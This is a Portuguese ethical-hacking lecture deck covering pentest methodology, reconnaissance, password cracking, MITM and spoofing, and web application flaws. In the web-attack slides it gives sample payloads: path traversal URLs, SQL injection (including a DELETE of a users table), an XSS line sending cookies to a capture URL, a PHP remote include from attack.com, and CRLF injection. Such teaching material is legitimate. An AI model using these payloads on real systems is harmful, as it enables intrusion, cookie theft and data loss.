ethical hacking slide completo
DESCRIPTION
Compilação de slides de Hacking Ético (Ethical hacker) do professor Marcos Flávio Araújo Assunção, autor de 9 livros sobre o tema. A apresentação aborda desde os fundamentos e metodologias até exploração de falhas, wireless hacking e outras técnicas.TRANSCRIPT
Ethical Hacking
Marcos Flávio Araújo AssunçãoCertified Ethical Hacker [email protected]
Apresentação do palestrante
Marcos Flávio Araújo Assunção
FormaçãoFormação
Mestrando em Sistemas de Informação, Mestrando em Sistemas de Informação, Universidade Fumec.Universidade Fumec.
Especialista em Docência para o Ensino Especialista em Docência para o Ensino Técnico Superior, Senac Minas.Técnico Superior, Senac Minas.
Especialista em Redes de Computadores, Especialista em Redes de Computadores, ESAB. Vitória, ES. ESAB. Vitória, ES.
Tecnólogo em Engenharia de Software, Tecnólogo em Engenharia de Software, UNATEC. Belo Horizonte, MG.UNATEC. Belo Horizonte, MG.
Marcos Flávio Araújo Assunção
Atuação profissionalAtuação profissional
Professor do Senac Minas e do Centro Universitário UNAProfessor do Senac Minas e do Centro Universitário UNA
Fundador da empresa DefHack Tecnologia Fundador da empresa DefHack Tecnologia ((www.defhack.com.brwww.defhack.com.br).).
Palestrante e Keynote em seminários sobre Ethical HackingPalestrante e Keynote em seminários sobre Ethical Hacking
Certified Ethical Hacker pelo EC-COUNCILCertified Ethical Hacker pelo EC-COUNCIL
Autor de 9 livros sobre Hacking e SegurançaAutor de 9 livros sobre Hacking e Segurança
Marcos Flávio Araújo Assunção
PublicaçõesPublicaçõesGuia do Hacker
Brasileiro
Desafio Linux Hacker
Segredos do Hacker Ético 1ª ,2ª, 3ª, 4ª e 5ª Edições
Honeypots e Honeynets
Wireless Hacking
Marcos Flávio Araújo Assunção
PublicaçõesPublicações
Marcos Flávio Araújo Assunção
Treinamentos em Ethical Hacking – Desde 1999Treinamentos em Ethical Hacking – Desde 1999
Marcos Flávio Araújo Assunção
Keynote em eventos de Ethical Hacking – Lisboa 2006Keynote em eventos de Ethical Hacking – Lisboa 2006
Marcos Flávio Araújo Assunção
Keynote em eventos de Ethical Hacking – Lisboa 2008Keynote em eventos de Ethical Hacking – Lisboa 2008
Marcos Flávio Araújo Assunção
Keynote em eventos de Ethical Hacking – Maputo 2014Keynote em eventos de Ethical Hacking – Maputo 2014
Marcos Flávio Araújo Assunção
CertificaçõesCertificações
Certified Ethical Hacker
Cisco Certified CCNA Instructor Trainer
(ITQ)
Marcos Flávio Araújo Assunção
Citações ProfissionaisCitações Profissionais( 2003 )( 2003 ) EUA. EUA. The New York TimesThe New York Times, , “Brazil Becomes a “Brazil Becomes a
cybercrime labcybercrime lab”. Por Tony Smith”. Por Tony Smith
( 2007 )( 2007 ) Portugal. Portugal. GQ PortugalGQ Portugal, , “Hacker Ético”,“Hacker Ético”, por Miguel dos por Miguel dos SantosSantos
( 2008)( 2008) Reino Unido. Reino Unido. McMafiaMcMafia, , “Code Orange”,“Code Orange”, Por Misha Por Misha GlennyGlenny
Marcos Flávio Araújo Assunção
Valhala HoneypotValhala Honeypot
-Detecção de Intrusos
- Pote de mel
-Grátis
- Totalmente em português
- Mais de 30 mil usuários
ProjetosProjetos
www.superdownloads.com.brwww.superdownloads.com.br
Marcos Flávio Araújo Assunção
Segurança? Isso existe?
Conheces teu inimigo e conhece-te a ti mesmo; se tiveres cem combates a travar, cem vezes serás vitorioso – Sun Tzu
Marcos Flávio Araújo Assunção
Por que não estamos seguros?
Configurações malfeitas
Softwares com falhas Redes desprotegidas Proteções ineficazes Falta de atualizações Fator humano
Vulnerabilidade
Marcos Flávio Araújo Assunção
62milsenhas-lulzsec
Marcos Flávio Araújo Assunção
220 sites fora hackeados - jusbrasil
Marcos Flávio Araújo Assunção
Segurança por obscuridade
Segurança Passiva- Semi-automática- Desatualizada- Pouco eficiente
Segurança Ativa- Manual- Bastante atualizada- Alta eficiência
Por que usar senhas complexas?
Marcos Flávio Araújo Assunção
Tipos de “Hackers”
Black Hat (Cracker)
White Hat (Ethical Hacker)
Gray Hat (indeciso)
Marcos Flávio Araújo Assunção
Crackers famosos
Marcos Flávio Araújo Assunção
414s
• Década de 80
• Invadiram Security Pacific Bank e Alamos National Laboratory
• Primeiro caso famoso na mídia
• Contribuiu para aprovação de leis contra hacking
Marcos Flávio Araújo Assunção
John Draper
• Década de 70
• Captain Crunch
• Apito
• Phreaking
•Recentemente:- Empresário - Firewall CrunchBox
Marcos Flávio Araújo Assunção
Robert Morris Jr.
• Ano de 1988
• Primeiro Worm
• MIT
• Derrubou 6 mil computadores
• Recentemente:- Empresário- ViaWeb (Yahoo Store)- Y Combinator
Marcos Flávio Araújo Assunção
Kevin Poulsen
• Década de 80
• KIIS-FM e o Porsche 944
• 51 meses de prisão
• Recentemente: - Jornalista - SecurityFocus
Marcos Flávio Araújo Assunção
Kevin Mitnick
• Década de 90
• Invadiu Sun, Nokia, Motorola e outras
• Free Kevin
• Takedown
• Atualmente:- Empresário e autor- Defensive Thinking- A arte de enganar
Marcos Flávio Araújo Assunção
Adrian Lamo
• Década de 2000
• Invadiu NYT, Microsoft e outros
• Capturado em 2003 e julgado em 2004
• Libertado em 2006
• Recentemente- Analista freelancer- “Can you hack it”
Marcos Flávio Araújo Assunção
Adrian, Mitnick e Poulsen
• Foram presos
• Se tornaram famosos
• Trabalham atualmente com segurança
• São minoria
Marcos Flávio Araújo Assunção
O Hacker Ético é uma necessidade do mercado ou apenas uma “frescura” adolescente?
Marcos Flávio Araújo Assunção
MCT convida movimento Hacker
brasilgovMarcos Flávio Araújo Assunção
Precisa-se de Hackers experientes
estadominas-onlineMarcos Flávio Araújo Assunção
Governo americano recruta hackers
globodigitalMarcos Flávio Araújo Assunção
Hacker Ético, um aliado na segurança.
hojeemdia
Marcos Flávio Araújo Assunção
Hacker Ético na mira das empresas
infoexameMarcos Flávio Araújo Assunção
Cresce a busca pelo Hacker Ético
jornal-o-globoMarcos Flávio Araújo Assunção
Hackers tem o apoio oficial do MCT
olhardigital
Marcos Flávio Araújo Assunção
Governo federal contratará Hackers
profissionaistiMarcos Flávio Araújo Assunção
Forbes – Hacker Ético é uma das principais carreiras do futuro
Marcos Flávio Araújo Assunção
O papel do Hacker Ético – O que é um Penetration Test?
Marcos Flávio Araújo Assunção
Você usaria um produto que nunca foi testado na prática?
capacete-destruído
Marcos Flávio Araújo Assunção
Teste de “stress” – Uma necessidade real
capacete-moto
Marcos Flávio Araújo Assunção
Teste de “stress” - Pressão
capacete
Marcos Flávio Araújo Assunção
Teste de “stress” - Temperatura
flame-test-helmet
Marcos Flávio Araújo Assunção
Penetration Test (Teste de Invasão) Consiste em utilizar
técnicas de Hackers em testes de stress da segurança de redes e sistemas
É a principal ferramenta de um Hacker Ético
Abordado pelo CEH (Certified Ethical Hacking)
“Invadir para proteger”
Marcos Flávio Araújo Assunção
Certificação de Hackers Éticos
eccouncil
Marcos Flávio Araújo Assunção
Níveis de um Pentester / Ethical Hacker
Nível 1 – Júnior – Tool based Penetration Tester:Esse profissional é aquele que somente conhece as ferramentas básicas parao pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas.Muitas vezes aprenderam as técnicas em treinamentos específicos. É neste nível que são “graduados” os profissionais CEH (Certified Ethical Hackers)
Nível 2 – Pleno – Coding based Penetration Tester:Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts para a realização dos penetration tests, mas ainda utiliza muitos recursos já “prontos” (como o Metasploit) para acelerar o processo de teste das vulnerabilidades. Necessita de conhecimentos pelo menos em algoritmos e linguagens básicas de programação.
Nível 3 – Sênior – Vulnerability Researcher:Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento mais avançado preferem debugar o funcionamento de softwares e protocolos em busca de falhas do tipo 0-day, e muitos são contratados por empresas com essa finalidade. O Google por exemplo costuma dar prêmios a quem descobre falhas no Chrome.
Marcos Flávio Araújo Assunção
Tipos de Penetration Test
Black Box
White Box
Gray Box
Marcos Flávio Araújo Assunção
Black Box
Teste realizado em um sistema remoto, sem nenhum conhecimento do alvo. O invasor deve partir da estaca zero, sem informações sobre endereços IPs públicos, sistemas operacionais utilizados, tipos de roteadores e firewalls, etc. Esse teste visa demonstrar a visão de um atacante de fora da intranet da empresa.
Marcos Flávio Araújo Assunção
Gray Box
Teste realizado entre departamentos ou sub-redes de uma intranet, com conhecimento parcial da estrutura. O objetivo desse teste é demonstrar até que ponto um funcionário consegue chegar caso ele decida tentar acessar um sistema de outro departamento ao qual ele não tem acesso legítimo. Nesse tipo de PenTest, temos conhecimento parcial da rede, como a faixa de endereços IPs utilizada na sub-rede de origem, o endereço IP do gateway e do servidor DNS, etc.
Marcos Flávio Araújo Assunção
White Box
Teste realizado em uma intranet local, com total conhecimento do alvo. Nesse teste, temos o conhecimento total de como a rede opera, sabemos todos os dispositivos, endereços e sistemas operacionais utilizados. A visão de um teste White Box é a de um administrador de rede. Essa metodologia de testagem é utilizada quando desejamos conhecer até onde um administrador poderá ir caso deseje acessar dados ou obter informações, tais como conversar de MSN, senhas de usuários, e-mails alheios, etc.
Marcos Flávio Araújo Assunção
Quando se utilizar de um PenTest?
“Quebrar” ao invés de “rastrear”
PenTest x Perícia Forense
Caso : HD do Daniel Dantas
Marcos Flávio Araújo Assunção
Metodologias de Penetration Test
Marcos Flávio Araújo Assunção
Metodologias de Penetration Test
O que é uma metodologia de PenTest?
Por que devemos seguir uma metodologia?
Vantagens e desvantagens
Marcos Flávio Araújo Assunção
Metodologias de Penetration Test
OSSTMM○ http://www.isecom.org/osstmm/
ISSAF○ http://www.oissg.org/issaf
Marcos Flávio Araújo Assunção
OSSTMM Metodologia mais popular Os testes são discutidos em um alto nível Inclui tecnologias únicas (RFID,
infravermelho) Não se baseia fortemente em ferramentas BackTrack se baseia nessa metodologia
OSSTMM (Open Source Security Testing Methodology Manual)
Marcos Flávio Araújo Assunção
OSSTMM Vantagens
Maior flexibilidade para PenTestersAtualizações frequentes
DesvantagensMaior curva de aprendizado
• Conhecimento de ferramentas e Sistemas Operacionais necessários como pré-requisito
Versões mais novas requerem pagamento
OSSTMM
Marcos Flávio Araújo Assunção
ISSAF (Information Systems Security Assessment Framework)
Contém dois documentos separados Gerenciamento (ISSAF0.2.1A) Penetration Testing (ISSAF0.2.1B)
Checklists para Auditoria / Proteção de Sistemas
Centrado em ferramentasMarcos Flávio Araújo Assunção
Vantagens○ Não exige conhecimento prévio de ferramentas e
sistemas operacionais○ Fornece exemplo do uso de ferramentas de
PenTest
Desvantagens○ Rapidamente desatualizado○ Exemplos de ferramentas de PenTest não são
extensivos
ISSAF
Marcos Flávio Araújo Assunção
O ISSAF é constituído de 5 fases: Fase I – Planejamento Fase II – Análise Fase III – Tratamento Fase IV – Resultados Fase V – Manutenção
Fases do ISSAF
Marcos Flávio Araújo Assunção
Fases de um Penetration Test
Marcos Flávio Araújo Assunção
Fases de um PenTest (Ataque)
Marcos Flávio Araújo Assunção
Vulnerabilidades
Categorias
Configuração Redes Dispositivos
móveis Software Malware Físicas Humanas
Tipo• Cliente • Servidor
Atuação• Local• Remota
Meio• Informática• Telefone / outros
Marcos Flávio Araújo Assunção
Etapas técnicas de um PenTest
Marcos Flávio Araújo Assunção
FootPrinting
Marcos Flávio Araújo Assunção
Pesquisa inicial (FootPrinting)
Pesquisa geral Ping e traceroute Sites de emprego Whois (internic e
arin) DNS Zone
Transfer Google Archive.Org Mail Tracking
Marcos Flávio Araújo Assunção
Ping e traceroute
Permitem descobrir informações como:
- IP e nome de servidores e roteadores intermediários
- Se há bloqueio de firewalls filtro de pacote
Marcos Flávio Araújo Assunção
Pesquisando sites de emprego
Vagas de emprego frequentemente revelam mais do que deveriam sobre a estrutura de TI de uma empresa
Marcos Flávio Araújo Assunção
Whois – Pesquisando domínios
Permite descobrir informações sobre um domínio
Vários sites podem ser usados. Exemplo: registro.br e internic.net
Marcos Flávio Araújo Assunção
Whois – Pesquisando IPs
ARIN.NET Permite descobrir
o range de endereços IP de uma rede pública
Marcos Flávio Araújo Assunção
DNS Zone Transfer Transfere zonas de
servidores DNS secundários vulneráveis
Pode usar o dig ou o nslookup
Exemplo (nslookup):
server ns2.empresa.comset type=ANYls –d empresa.com
Marcos Flávio Araújo Assunção
Google Hacking Descobrir informações pelo google usando
comandos como site, filetype, inurl e index of, entre outros.
Marcos Flávio Araújo Assunção
Archive.Org – WayBack Machine
Permite visualizar versões passadas de qualquer website já criado desde o surgimento da WEB.
Extremamente útil para ver a evolução de uma empresa
Mostra o “ano” de quando o site foi criado. Isso é muito relevante pois podemos saber quando a empresa começou a atuar.
Outra vantagem: poder “rever” o conteúdo de um site que já saiu do ar.
Marcos Flávio Araújo Assunção
Archive.Org – WayBack Machine
Marcos Flávio Araújo Assunção
Mail Tracking
Mail Tracking é um serviço extremamente útil, que permite monitorar os e-mails que você envia para saber se o destinatário leu a mensagem, o horário que isto aconteceu – e o mais importante – o endereço IP do sistema que destinatário estava utilizando no momento.
Marcos Flávio Araújo Assunção
Mail TrackingBasta se cadastrar no site e mandar o seu e-mail com “mailtracking.com” no final da mensagem. Exemplo: [email protected] .
Assim que o destinatário abrir a mensagem, logue no mailtracking e veja os dados capturados:
Marcos Flávio Araújo Assunção
Varredura e Enumeração
Marcos Flávio Araújo Assunção
Etapas da Varredura
Varredura de hosts (endereços IP) na rede
Varredura de portas (serviços ativos)
Marcos Flávio Araújo Assunção
Varredura de IPs
Tem como objetivo descobrir as máquinas ativas da rede
Ping Sweep UDP Scan Softwares: ping,
hping3, nmap (-sV), superscan, etc.
Marcos Flávio Araújo Assunção
Varredura de portas
Tem como objetivo identificar os serviços ativos no sistema
Softwares usados: NMAP, Superscan, etc.
Tipos de varredura: Full, Half-Syn, FIN, ACK, XMAS, NULL, UDP, etc.
Marcos Flávio Araújo Assunção
Enumeração
Tem como objetivo identificar os serviços rodando nas portas e o sistema operacional do alvo
Captura de banners
Fingerprint Sessão Nula (old!) Regras de Firewall
Marcos Flávio Araújo Assunção
Captura de Banners
Basta se conectar ao serviço usando telnet
Muitos serviços não são configurados para alterar o banner padrão
Mostra o nome e a versão do software
Informação pouco confiável
Marcos Flávio Araújo Assunção
Fingerprint
Usa um banco de dados de “impressões digitais” para identificar o serviço
Baseia-se na análise do comportamento de pacotes
Marcos Flávio Araújo Assunção
Fingerprint com o NMAP
Sistema Operacional: (opção –O))
Serviços das portas: (opção –A))
Marcos Flávio Araújo Assunção
Vulnerabilidades de Senhas
Marcos Flávio Araújo Assunção
Autenticação por senhas Senhas fracas Bloqueio por tentativas “Tentativa e erro” Força-Bruta local
(eficiente) Força-Bruta remota
(não tão eficiente) Wordlists (dicionários) Rainbow Tables
Marcos Flávio Araújo Assunção
Força-Bruta remota - xHydra
Muito usado em sistemas Linux.
Permite força-bruta em diversos protocolos de aplicação: HTTP, FTP, SQL, VNC e muito mais.
Entretanto, somente trabalha com wordlists.
Marcos Flávio Araújo Assunção
Força-Bruta remota - Brutus
Para sistemas Windows
Mais limitado e com suporte a menos protocolos que o XHydra
Entretanto, trabalha com “bruteforce real” ao invés de somente wordlists
Marcos Flávio Araújo Assunção
Força-Bruta local - Cain
Para sistemas Windows
Permite tentar descobrir localmente diversos tipos de hash
Tem suporte a, entre outros:LM, NTLM, MD5, SHA-1, WPA1, etc.
Marcos Flávio Araújo Assunção
Força-Bruta local - Cain
Marcos Flávio Araújo Assunção
Rainbow Tables
São “tabelas” que podem ser geradas ou baixadas da Internet
Visam “acelerar” o processo de força-bruta local ao pesquisar hashes já descobertos
O WINRTGEN permite gerar suas próprias RTs
Marcos Flávio Araújo Assunção
Rainbow Tables Online
Muitos sites oferecem o serviço de rainbow tables online
Isso permite que você quebre diversos tipos de hash em questão de segundos
Sites: Online Hash Crack e CrackStation, entre outros.
Marcos Flávio Araújo Assunção
Vulnerabilidades de Rede
Marcos Flávio Araújo Assunção
Vulnerabilidades de rede
Podemos dizer que as vulnerabilidades de rede mais comuns são:
Farejamento (sniffing)Redirecionamento de tráfegoSpoofingHijackingMan in the middle
Marcos Flávio Araújo Assunção
Farejamento de tráfego
Sniffers Modo
promíscuo Dados sem
criptografia Passivo Capturando
senhas Limitado
Marcos Flávio Araújo Assunção
Redirecionamento de tráfego Sniffing ativo Farejar tráfego
de outros dispositivos
Redirecionar o tráfego para o ponto desejado
ARP Poisoning ICMP redirect DHCP Spoofing Port Stealing
Marcos Flávio Araújo Assunção
Arp Poisoning
VLANsAddress ResolutionProtocol (ARP)Cache ARPDinâmico x EstáticoPort Security não protege contra isto.
Marcos Flávio Araújo Assunção
ICMP Redirect
Outro métodointeressanteICMP Type 5Redirect“Sou a melhor rota”Bom para redirecionar tráfego de roteadores
Marcos Flávio Araújo Assunção
DHCP Spoofing
Spoof = falsoServidor DHCPAtribui endereços antes do verdadeiro servidorCondição de corrida
Marcos Flávio Araújo Assunção
Port Stealing
Nível de enlacePortas do SwitchEthernet framesSpoofing/Poisoning
Permite capturar o tráfego de VLANs mal configuradas ao se passar por um tronco (802.1d trunk)
Marcos Flávio Araújo Assunção
Man in The MiddleColocando-se no meio da
transação
Marcos Flávio Araújo Assunção
Man in the Middle
No “meio” da transmissão
Sessão dupla Local (ARP) Remoto (Proxy) Tráfego
criptografado
Marcos Flávio Araújo Assunção
MITM – Lado Cliente
Ponta ClienteInicia a conexãoResponsável por dados de autenticação, como senhas e cookies de sessãoAutenticação alterada “on the fly”
Marcos Flávio Araújo Assunção
MITM – Lado Servidor
Ponta servidorResponde às solicitações da conexão clienteDiz se o cliente está autenticado ou nãoManipulação de html“Entre novamente com a senha”
Marcos Flávio Araújo Assunção
Como é possível o MITM?
Interceptação do certificado “real” do servidor verdadeiroChavesCertificado Digital “falso” enviado ao clienteConexão dupla criptografada O browser reclama, mas não impede na maioria dos casosOs avisos do browser podem ser removidos por outras técnicas
Marcos Flávio Araújo Assunção
Alguns protocolos suportados pelo MITM
Secure Socket Layer (SSL)Secure Shell (SSHv1)Remote Desktop Protocol (RDP)
Marcos Flávio Araújo Assunção
Softwares de rede local para MITM
Marcos Flávio Araújo Assunção
CAIN
Plataforma: WindowsRedirecionamentoarp poisoningO mais simples de se utilizarMITM de RDPMITM de DNS Gera os certificados automaticamente
Marcos Flávio Araújo Assunção
DSniff
Plataforma: LinuxRedirecionamento : Arp poisoningarpspoofmacofwebmitmsslmitm
Marcos Flávio Araújo Assunção
EttercapPlataforma: Linux e WindowsRedirecionamento : Arp Poisoning, Port Stealing, ICMP Redirect e DHCP SpoofingPode sequestrar a sessãoPossui diversos plug-ins
Marcos Flávio Araújo Assunção
SSL Strip
Apresentado na BlackHat de 2009 pelo criador do SSLSniff Utiliza novas técnicas de hijacking para capturar novas sessõeshttp/httpsNão depende de aguardar redirect 301/302 Mais eficiente que o ettercap e o Cain
Marcos Flávio Araújo Assunção
SSL Strip
Marcos Flávio Araújo Assunção
Passos necessários para o SSL Strip funcionar:
- IP Forward- Port redirect- ARP spoofing (poisoning)
Softwares Proxy para MITM
Marcos Flávio Araújo Assunção
Achilles
Plataforma: WindowsProof of conceptLentoMuitos errosNão separa os dados nas conexõesPermite alteração limitada “on the fly”
Marcos Flávio Araújo Assunção
Achilles
Senha capturada por MITM de uma conexão HTTPS. Note que a janela é dos dados provenientes do lado cliente.
Marcos Flávio Araújo Assunção
Paros Proxy
Plataforma: Java Virtual MachineMuitos recursosMais rápidoSepara os dados em diversas “pastas”Permite filtro para alteração “on the fly”- Ex: “senha”
Marcos Flávio Araújo Assunção
Spoofing e Hijacking
Marcos Flávio Araújo Assunção
Spoofing
Informações falsas Autenticação Cliente não precisa
estar online ARP Spoofing DNS Spoofing IP Spoofing MAC Spoofing
Marcos Flávio Araújo Assunção
Tipos de IP Spoofing
Blind IP Spoofing
É o spoof “cego”. Acontece quando você envia o pacote com o IP de origem falsificado, mas como o destino está em outra rede você não consegue farejar e ver a resposta.:
Non-Blind IP Spoofing
Neste caso, você está na mesma LAN (e na mesma VLAN) da máquina de destino a qual você mandou o pacote spoofado. Então, farejando o trafégo com o wireshark ou outro sniffer você consegue visualiazr a “resposta”.
Marcos Flávio Araújo Assunção
Non-Blind IP Spoofing com STERM:
Marcos Flávio Araújo Assunção
Non-Blind IP Spoofing com STERM:
Marcos Flávio Araújo Assunção
DNS Spoofing
É um dos tipos mais perigosos
Permite enviar respostas “falsas” de consultas DNS a um cliente.
Pode ser facilmente realizado pelo Cain ou Ettercap se há redirecionamento de tráfego
Marcos Flávio Araújo Assunção
DNS Spoofing com CAIN
Marcos Flávio Araújo Assunção
Hijacking
Sequestro de sessões
Números de sequência
Necessita do cliente online
Ack Storm Retransmissão
Marcos Flávio Araújo Assunção
Hijacking
Usando firesheep para capturar cookies http e sequestrar sessões
Marcos Flávio Araújo Assunção
Vulnerabilidades de Servidores e Aplicações
WEB
Marcos Flávio Araújo Assunção
Enganos de Segurança
O Firewall protege meu servidor web e meu banco de dados Acesso à porta 80 e 443 do seu servidor Web
faz parte do seu perímetro de defesa externo Vulnerabilidades no servidor Web ou em
aplicações web podem levar à um acesso interno da rede… passando pelo firewall.
Marcos Flávio Araújo Assunção
Enganos de Segurança (cont.)
O IDS protege meu servidor Web e meu banco de dados O IDS é configurado para detectar assinaturas
de ataques bem conhecidos Essas assinaturas não incluem as feitas contra
aplicações customizadas
Marcos Flávio Araújo Assunção
Enganos de Segurança (cont.)
SSL protege meu site SSL protege o transporte de dados entre o
servidor web e o browser do usuário SSL não protege contra ataques destinados ao
cliente ou à aplicação SSL é o melhor amigo dos hackers devido ao
falso senso de segurança (vide ataques de MITM)
Marcos Flávio Araújo Assunção
Falhas clássicas em Servidores Web
Marcos Flávio Araújo Assunção
Buffer Overflow
Exploração de falhas muito utilizada ainda hoje Dados de entrada > buffer (- tratamento) IIS Apache Shell remoto ou outro payload Acesso à rede interna Também acontece com aplicações web
Marcos Flávio Araújo Assunção
Injeção de comandos em Hexa
Codificando em hexa as strings das URLs, pode ser possível burlar filtros de segurança e IDS.
http://www.site.com/cgi?arquivo=/etc/passwd
Pode ficar assim:
http://www.site.com/cgi?arquivo=/%2F%65%74%63%2F%70%61%73%73%77%64
Marcos Flávio Araújo Assunção
Codificação dupla em hexa
Primeira:
scripts/..%255c../winnt
se torna:
scripts/..%5c../winnt
(%25 = caractere “%”)
Segunda:
scripts/..%5c../winnt
se torna:
scripts/..\../winnt
Travessia de diretórios agora é possível utilizando codificação dupla em hexa.
Marcos Flávio Araújo Assunção
Barra em Unicode
Em unicode, “%c0%af”, é o equivalente à barra (“/”). Então, um exploração ficaria:
scripts/..%c0%af../winntE seria convertido para:
scripts/../../winnt
Travessia de diretórios também é possível usando ofuscação através do Unicode
Marcos Flávio Araújo Assunção
Falhas em Aplicações Web
Marcos Flávio Araújo Assunção
Entrada maliciosa - Injection
Problema muito comum
Filtro malfeito Lado servidor SQL Injection
‘’ or’=‘
‘ 1 = 1 --
Marcos Flávio Araújo Assunção
Saída maliciosa - XSS
Mesmo princípio do injection
Tipo cliente Utilizado
normalmente para captura de cookies
Marcos Flávio Araújo Assunção
Problemas comuns
Algoritmo fraco – Muitos sites web hoje estão usando algoritmos lineares baseados em variáveis previsíveis, como tempo ou endereço IP.
Sem bloqueio de conta – Pode ser feito ataques de força-bruta na ID de sessão sem que o servidor web reclame.
Expiração indefinida – Se a sessão não expira facilmente, o invasor tem tempo quase ilimitado para
tentar descobrir o ID.
Marcos Flávio Araújo Assunção
IDs em Campos Ocultos
<FORM METHOD=POST ACTION="/cgi-bin/access.cgi">
<input type="hidden" name="sessionID" value=”abc123”>
<input type="hidden" name=“usuario" value=”Carol”>
<input type="submit" name=“Logar no sistema"></form>
Marcos Flávio Araújo Assunção
Cross Site Scripting (XSS)
Atacante injeta scripts (JavaScript) no browser
O código é executado pelo browser para realizar alguma ação
Muito usado para roubar cookiesFunciona geralmente no lado cliente
Marcos Flávio Araújo Assunção
Cross-Site Request Forgeries (CSRF)
Evolução do Cross Site ScriptingUsar POST em vez de GETForçar o uso de forms próprios via
TOKEN aleatórioMais difícil de impedir que XSS
[img]http://seuforum.com/novaresposta.php?action=newthread&subject=teste&body=alguma+coisa+aqui&submit=go[/img]
Marcos Flávio Araújo Assunção
CRLF Injection Carrier Return and Line Feed (CRLF) Caracteres especiais que representam o “fim da
linha” (end of line – EOL) O servidor “verdadeiro” gera o código HTML, o que
torna o ataque perigoso. Exemplo:http://www.seusite.com.br/somepage.php?page=%0d%0aContent-
Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3EConteúdo Hacker%3C/html%3E
O usuário verá uma página com os dizeres “Conteúdo Hacker” escrito na mesma.
Marcos Flávio Araújo Assunção
Explorando Filtros malfeitos
Marcos Flávio Araújo Assunção
PHP Injection Includes mal configurados permitem que outro script
remoto seja executado Isso permite que você execute programas no sistema,
obtenha arquivos, etc.
<?
include "$file.inc"; //include “http://attack.com/script.inc";
?>
script.php?file=http://site.com/script
<?
system("ls $cmd"); //system("ls -la | wall bom dia");
?>
script.php?cmd=-la | wall bom dia
Marcos Flávio Araújo Assunção
Exemplos de XSS
<script> alert(‘Oi’!) </script> <script>
location.href=“http://www.site.com/captura.cfm?c=“ + document.cookie</script>
<a href=“javascript#[código]> <div style=“behaviour: url([código]);”> <body onload=“[código]”> <img src=“javascript:[código]”>
Marcos Flávio Araújo Assunção
SQL Injection
SQL Injection é um ataque de injeção de comandos causado por uma entrada de dados não validada corretamente
O atacante inclui uma entrada maliciosa com a intenção de alterar a consulta ao banco de dados realizada
Funciona apenas no lado servidor
Marcos Flávio Araújo Assunção
Métodos do SQL InjectionO SQL Injection pode ser utilizado com dois
métodos do HTTP:
GET – Nesse método a inserção dos comandos SQL é realizada diretamente na URL do site. Exemplo: GET /usuarios.asp?sobrenome=assuncao’;DELETE
FROM users WHERE 1=‘1 HTTP/1.1
POST – Nesse método a inserção dos comandos SQL é
feita nos campos de um formulário. Exemplo: ‘’ OR ‘=‘
Marcos Flávio Araújo Assunção
Tipos de SQL InjectionExistem dois tipos básicos de SQL Injection
Error Based SQL Injection – O atacante detecta que o website é vulnerável devido a erros de SQL mostrados na tela, usando-os também para guiar o ataque.
Blind SQL Injection – O site é vulnerável a SQL Injection mas não apresenta nenhum tipo de erro ao atacante, o que torna mais difícil de detectar a falha.
Marcos Flávio Araújo Assunção
Error Based SQL Injection (POST)
Marcos Flávio Araújo Assunção
Error Based SQL Injection (POST)
Marcos Flávio Araújo Assunção
SQL Injection: Exemplo normal 1
GET /view_account.cfm?acct_id=10 HTTP/1.1
SELECT * FROM accounts WHERE acct_id = 10
Marcos Flávio Araújo Assunção
SQL Injection : Exemplo injeção 1
GET /view_account.cfm?acct_id=10 OR 1=1 HTTP/1.1
SELECT *
FROM accounts
WHERE acct_id = 28 OR 1=1 --
Marcos Flávio Araújo Assunção
SQL Injection: Exemplo normal 2
GET /user_lookup.cfm?lastname=assuncao HTTP/1.1
SELECT * FROM users WHERE lastname = ‘assuncao’
Marcos Flávio Araújo Assunção
SQL Injection: Exemplo injeção 2
GET /user_lookup.cfm?lastname=assuncao ’;DELETE FROM users WHERE 1=‘1 HTTP/1.1
SELECT * FROM users WHERE lastname = ‘assuncao’;DELETE FROM
users WHERE 1=‘1’
Marcos Flávio Araújo Assunção
SQL Injection - Dicas
acct_id=10 OR 1 = ‘1’ Tente várias cláusulas OR usando <>, >, >=, LIKE, etc. Use comandos para acabar prematuramente com uma
consulta SELECT * FROM users WHERE user_id = 1-- AND
password=‘minhasenha’
Enumerar informação do banco de dados acct_id=10 UNION SELECT name [,1,2,…] FROM objetos
WHERE xtype=‘U’ acct_id=10 UNION SELECT [colunas] FROM [tabela]
UNION requer que ambos os pedidos compartilhem um número comum de colunas, acrescentando colunas quando requerido
Marcos Flávio Araújo Assunção
SQL Injection – Automatização Alguns softwares de vulnerabilidade permitem detectar
erros de SQL automaticamente. Alguns exemplos: Nessus SQLFinder Acunetix WVS
Existem até alguns programas que podem explorar automaticamente o SQL Injection, automatizando o processo. Exemplos: Havij SQL Ninja Fast-Track Metasploit
Marcos Flávio Araújo Assunção
Exemplo: Havij (SQL Injection GET)
Marcos Flávio Araújo Assunção
Exemplo: Havij (Online Crack MD5)
Marcos Flávio Araújo Assunção
SQL Injection: Indo além
Concatene múltiplos comandos acct_id=28; DROP TABLE Users;
Procedimentos úteis xp_msver xp_cmdshell [command] -> PERIGO!PERIGO! xp_servicecontrol [action] [service]
Marcos Flávio Araújo Assunção
Exemplo xp_cmdshell
Marcos Flávio Araújo Assunção
Exemplo xp_cmdshell
Marcos Flávio Araújo Assunção
Considerações sobre o SQL Server
O SQL Server vem por padrão com o usuário ‘sa’ (system administrator).
Muitos administradores não colocam senhas muito complexas para este usuário
O BackTrack possui várias ferramentas para tentar fazer força bruta na conta sa e, caso a senha seja descoberta, pode-se executar o xp_cmdshell sem precisar de SQL Injection.
Marcos Flávio Araújo Assunção
Vulnerabilidades de Software – Exploração de falhas
Marcos Flávio Araújo Assunção
Objetivos da exploração de falhas
Falhas remotas – Ganhar acesso não autorizado ao sistema alvo (normalmente ao shell) ou causar Denial of Service
Falhas locais – Elevar os privilégios de acesso para root/system ou causar Denial of Service
Normalmente um atacante irá explorar uma falha remota para invadir um sistema e loco depois tentará a elevação de privilégios. O motivo para isto é que a maioria dos serviços hoje rodam no perfil de usuários com poucos privilégios como o nobody/guest.
Marcos Flávio Araújo Assunção
Tipos de falhas Stack
overflow Heap
overflow Heap
Spraying Memory
Corruption String format Race
conditions Privilege
Escalation
Marcos Flávio Araújo Assunção
Pesquisa manual por Falhas - SecurityFocus
Marcos Flávio Araújo Assunção
Scanners “genéricos” de vulnerabilidades
Não se focam em um serviço específico.
São como um médico generalista, detectam “superficialmente” problemas em vários protocolos.
